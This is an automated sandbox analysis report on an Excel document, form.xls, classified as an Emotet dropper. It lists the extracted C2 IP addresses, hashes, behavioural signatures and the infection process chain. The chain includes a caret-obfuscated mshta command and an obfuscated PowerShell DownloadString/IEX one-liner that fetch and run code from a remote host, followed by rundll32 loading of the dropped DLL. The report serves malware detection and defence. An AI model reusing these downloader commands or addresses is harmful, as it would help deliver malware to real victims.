Analysis
-
max time kernel
122s -
max time network
154s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 01:21
Behavioral task
behavioral1
Sample
form.xls
Resource
win7-en-20211208
General
-
Target
form.xls
-
Size
47KB
-
MD5
da5f5c8ebdc10b6e77da2c377b938734
-
SHA1
6ea85a244cde074f36c1af938a1d9bb5bb36b9ae
-
SHA256
c1588629a0158ff10768a40ec5a6492b1028b73d2cf9a85f7d74f427f71beed2
-
SHA512
f0f451785e81c6847ccb5c4e8983baf752518b5065c3834790de233f7a1fb1dcf9083bc929679b0a2344842ed004913d1f75022326d971aca58570d314c7f149
Malware Config
Extracted
http://91.240.118.168/vvv/ppp/fe.html
Extracted
http://91.240.118.168/vvv/ppp/fe.png
Extracted
emotet
Epoch4
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2368 3140 CMD.EXE EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 37 1372 mshta.exe 38 896 powershell.exe 40 896 powershell.exe 50 3524 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 948 rundll32.exe 1916 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Pattncvcj\nfrki.chz rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3140 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exerundll32.exepid process 896 powershell.exe 896 powershell.exe 896 powershell.exe 3524 rundll32.exe 3524 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 896 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE 3140 EXCEL.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
EXCEL.EXECMD.EXEpowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 3140 wrote to memory of 2368 3140 EXCEL.EXE CMD.EXE PID 3140 wrote to memory of 2368 3140 EXCEL.EXE CMD.EXE PID 2368 wrote to memory of 1372 2368 CMD.EXE mshta.exe PID 2368 wrote to memory of 1372 2368 CMD.EXE mshta.exe PID 896 wrote to memory of 1012 896 powershell.exe cmd.exe PID 896 wrote to memory of 1012 896 powershell.exe cmd.exe PID 1012 wrote to memory of 948 1012 cmd.exe rundll32.exe PID 1012 wrote to memory of 948 1012 cmd.exe rundll32.exe PID 1012 wrote to memory of 948 1012 cmd.exe rundll32.exe PID 948 wrote to memory of 1916 948 rundll32.exe rundll32.exe PID 948 wrote to memory of 1916 948 rundll32.exe rundll32.exe PID 948 wrote to memory of 1916 948 rundll32.exe rundll32.exe PID 1916 wrote to memory of 2420 1916 rundll32.exe rundll32.exe PID 1916 wrote to memory of 2420 1916 rundll32.exe rundll32.exe PID 1916 wrote to memory of 2420 1916 rundll32.exe rundll32.exe PID 2420 wrote to memory of 3524 2420 rundll32.exe rundll32.exe PID 2420 wrote to memory of 3524 2420 rundll32.exe rundll32.exe PID 2420 wrote to memory of 3524 2420 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\form.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://91.240.118.168/vvv/ppp/fe.html3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pattncvcj\nfrki.chz",sujrctswIYHGAk8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pattncvcj\nfrki.chz",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QWER.dllMD5
f0bd9fc58296e16df198512822c5f5d4
SHA12160cb4cfad57c4b1b27eb91a8da06754c421697
SHA2562713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3
SHA512d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe
-
\ProgramData\QWER.dllMD5
f0bd9fc58296e16df198512822c5f5d4
SHA12160cb4cfad57c4b1b27eb91a8da06754c421697
SHA2562713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3
SHA512d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe
-
\ProgramData\QWER.dllMD5
f0bd9fc58296e16df198512822c5f5d4
SHA12160cb4cfad57c4b1b27eb91a8da06754c421697
SHA2562713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3
SHA512d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe
-
memory/896-313-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmpFilesize
385.9MB
-
memory/896-320-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmpFilesize
385.9MB
-
memory/896-319-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmpFilesize
385.9MB
-
memory/896-277-0x0000017DF32F0000-0x0000017DF3312000-memory.dmpFilesize
136KB
-
memory/896-296-0x0000017DF34B0000-0x0000017DF34EC000-memory.dmpFilesize
240KB
-
memory/896-307-0x0000017DF39C0000-0x0000017DF3A36000-memory.dmpFilesize
472KB
-
memory/948-323-0x0000000004671000-0x0000000004692000-memory.dmpFilesize
132KB
-
memory/1916-329-0x0000000004C60000-0x0000000004C85000-memory.dmpFilesize
148KB
-
memory/1916-339-0x0000000005130000-0x0000000005155000-memory.dmpFilesize
148KB
-
memory/1916-343-0x0000000005190000-0x00000000051B5000-memory.dmpFilesize
148KB
-
memory/1916-337-0x0000000004F60000-0x0000000004F85000-memory.dmpFilesize
148KB
-
memory/1916-335-0x0000000004F00000-0x0000000004F25000-memory.dmpFilesize
148KB
-
memory/1916-333-0x0000000004EA0000-0x0000000004EC5000-memory.dmpFilesize
148KB
-
memory/1916-331-0x0000000004D40000-0x0000000004D65000-memory.dmpFilesize
148KB
-
memory/1916-326-0x0000000004670000-0x0000000004695000-memory.dmpFilesize
148KB
-
memory/2420-341-0x0000000004C70000-0x0000000004C95000-memory.dmpFilesize
148KB
-
memory/3140-381-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-116-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-118-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-117-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-119-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-129-0x00007FF9F7A00000-0x00007FF9F7A10000-memory.dmpFilesize
64KB
-
memory/3140-128-0x00007FF9F7A00000-0x00007FF9F7A10000-memory.dmpFilesize
64KB
-
memory/3140-115-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-383-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-382-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3140-380-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmpFilesize
64KB
-
memory/3524-344-0x0000000000CF0000-0x0000000000D15000-memory.dmpFilesize
148KB
-
memory/3524-355-0x0000000004BD0000-0x0000000004BF5000-memory.dmpFilesize
148KB
-
memory/3524-357-0x0000000004CB0000-0x0000000004CD5000-memory.dmpFilesize
148KB
-
memory/3524-353-0x0000000004AF0000-0x0000000004B15000-memory.dmpFilesize
148KB
-
memory/3524-351-0x0000000004A10000-0x0000000004A35000-memory.dmpFilesize
148KB
-
memory/3524-349-0x0000000004930000-0x0000000004955000-memory.dmpFilesize
148KB
-
memory/3524-346-0x00000000010F0000-0x0000000001115000-memory.dmpFilesize
148KB